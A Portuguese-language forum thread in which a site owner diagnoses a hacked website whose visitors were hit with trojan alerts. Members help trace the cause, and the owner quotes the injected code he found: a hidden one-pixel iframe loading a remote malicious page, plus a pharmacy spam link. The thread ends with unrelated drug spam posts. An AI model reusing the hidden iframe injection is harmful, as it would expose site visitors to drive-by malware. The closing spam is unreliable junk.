14 replies to this topic

[Brackmann]

Olá, tudo bem?
Desde ontem alguns visitantes de meu site vêm reclamando que, ao entrar no website, o antivirus acusa que há trojans tentando invadir o computador. Alguns inclusive dizem que o PC ficou mais lento após acessar o site, e que após fazer um scan com o antivírus, encontraram trojans.

Eu acessei o site para conferir, e recebi o seguinte alerta com o antivírus NOD32.

Module: IMON
Object: file
Threat: http://www.milk0soft.com/ipck/index.php JS/TrojanDownloader.Agent.ZZ trojan

Após isso, não recebi mais nenhum alerta no site, mas ainda há gente reclamando de até três trojans tentando invadir o PC.
Gostaria de saber como é possível isso, e se há como eu saber de onde estão vindo estes "ataques" para que eu posso consertar.

O endereço do site é khbrasil .net

Obrigado pela atenção!

Edição feita por: Brackmann, 18/12/2007, 13:28.

[.EC]

Brackmann,
Verifique o código HTML do site, deve ter algum iframe redirecionando para esse site malicioso.

[Brackmann]

Cara, eu tentei isso, e, pelo menos no código do index, não há nada que faça referência ao site em questão. Será que não há outra forma de saber de onde está vindo isso, e parar?

Obrigado pela ajuda.

Edição feita por: Brackmann, 09/12/2007, 00:28.

[gaguinho]

Pode ser algum banner, iframe, javascript,etc... tenta ver o que tem e faz uns testes pra saber qual tá propagando o vírus.

[.EC]

Acessei seu site agora e recebi um alerta do NOD32, mas, o link da página do vírus era diferente do citado por vc.

http://damndskj.com/check/vers55.php - uma variante modificada de Win32/TrojanDownloader.Tiny.NJ trojan

Edição feita por: .EC, 09/12/2007, 11:15.

[Brackmann]

Bah, que saco... acabei de achar um código malicioso bem no final do código da index (se eu tivesse começado pelo fim XD)...

<a href="http://lothlorian.org.ua">viagra xenical, viagra levitra</a>

<iframe src="http://220.130.128.170/ic/sp/index.php" width=1 height=1 style="visibility: hidden"></iframe>

Mas como será que conseguiram modificar a página?
Depois de pesquisar bastante eu vi que tem bastante gente (apesar de em fóruns americanos) com problemas similiares. Eles comentavam qeu poderia ser problema de segurança no servidor... e que depois de apagar o código malicioso da página ele continuava a voltar... apaguei aqui, vou ver o que acontece.

O problema é que eu não recebo essas mensagens de vírus aqui, será que alguém poderia entrar e testar, pra ver se a retirada desse código resolve o problema, ou se tem mais algum escondido?

Valeu pela ajuda!

[.EC]

Brackmann,
Isso pode ser feito de várias maneiras...

* Hacking pelo servidor, ai vc tem que falar com sua hospedagem
* Roubo de senha de um ou mais administradores
* Keylogger instalado no PC de um ou mais administradores
* Vulnerabilidade no script usado para criar o site / fórum

[Programador]

Isso acontece muito em versões "modificadas" de fóruns, scripts prontos

[.EC]

Em versões piratas de scripts pagos (como o IPB) também.

[marceloaugustoweb]

Olá Amigos do fórum, o problema parece ser antigo, e está acontecendo comigo. Eu tenho um plano de revenda, e um dos dominios eu deleto os arquivos e upo outra vez, após alguns minutos, todos estão infectados por códigos maliciosos.. a questão é que não estou conseguindo nenhuma solução, o site foi feito de maneira bem simples, alguém já passou por isso e conseguiu solucionar? se sim, como? Aguardo e agradeço a colaboração de todos vocês.

Edição feita por: marceloaugustoweb, 26/08/2008, 14:52.

['' sem.Ponto]

Se demora uns minutos para o código malicioso aparecer em seu site é porque estão inserindo via FTP, ou seja, roubaram sua senha. Logicamente seu computador também está infectado, mesmo se você mudar a senha do FTP eles vão conseguir roubar a nova senha de você mais uma vez.

Já tentou formatar o computador e depois mudar a senha do FTP? Se não tiver funcionado é bem provavél que o vírus tenha se instalado na memória ram também.

Você tem que limpar o seu computador, ou é isso ou é isso.

Não tem outra forma. Limpe o computador e depois mude a senha do FTP. E não deixe de verificar o código das páginas que estiverem em seu computador, porque se você abrir um arquivo com o código malicioso dentro do seu computador, o vírus vai se instalar novamente.

[marceloaugustoweb]

Se demora uns minutos para o código malicioso aparecer em seu site é porque estão inserindo via FTP, ou seja, roubaram sua senha. Logicamente seu computador também está infectado, mesmo se você mudar a senha do FTP eles vão conseguir roubar a nova senha de você mais uma vez.

Já tentou formatar o computador e depois mudar a senha do FTP? Se não tiver funcionado é bem provavél que o vírus tenha se instalado na memória ram também.

Você tem que limpar o seu computador, ou é isso ou é isso.

Não tem outra forma. Limpe o computador e depois mude a senha do FTP. E não deixe de verificar o código das páginas que estiverem em seu computador, porque se você abrir um arquivo com o código malicioso dentro do seu computador, o vírus vai se instalar novamente.

parece que era exatamente isso, o problema foi solucionado com a mudança de senha do Cpanel. O que quer que estava infectando os arquivos, estava usando a senha do cpanel, pra infectar os arquivos, depois que troquei a senha o problema acabou. agradeço a ajuda de todos que se esforçaram...

[khd+]

mauditos hackers.hackearam o unico site que fala praticamente só de kingdom hearts só hacjeam quando tinha três keyblades que prestam
desculpa brackmann se fui um floder no
seu forum

problemas

nenhuma das paginas envolvendo khbrasil funciona

[HaroNism]

Rx 4 Amoxicillin Cialis Und Levitra Kombinieren Vendo Viagra Torino viagra online prescription Can I Purchase Acticin Scabies

[HaroNism]

Achat Kamagra Bordeaux Buy Plavix Uk cialis Kamagra Alcorcon Cheapest Propecia 40 Mg Buy Atarax No Script
Componentes Viagra viagra Free Propecia Voucher
Kamagra 100mg Generico Sale generic isotretinoin c.o.d. website brandlevitra on line Zithromax Pharmacy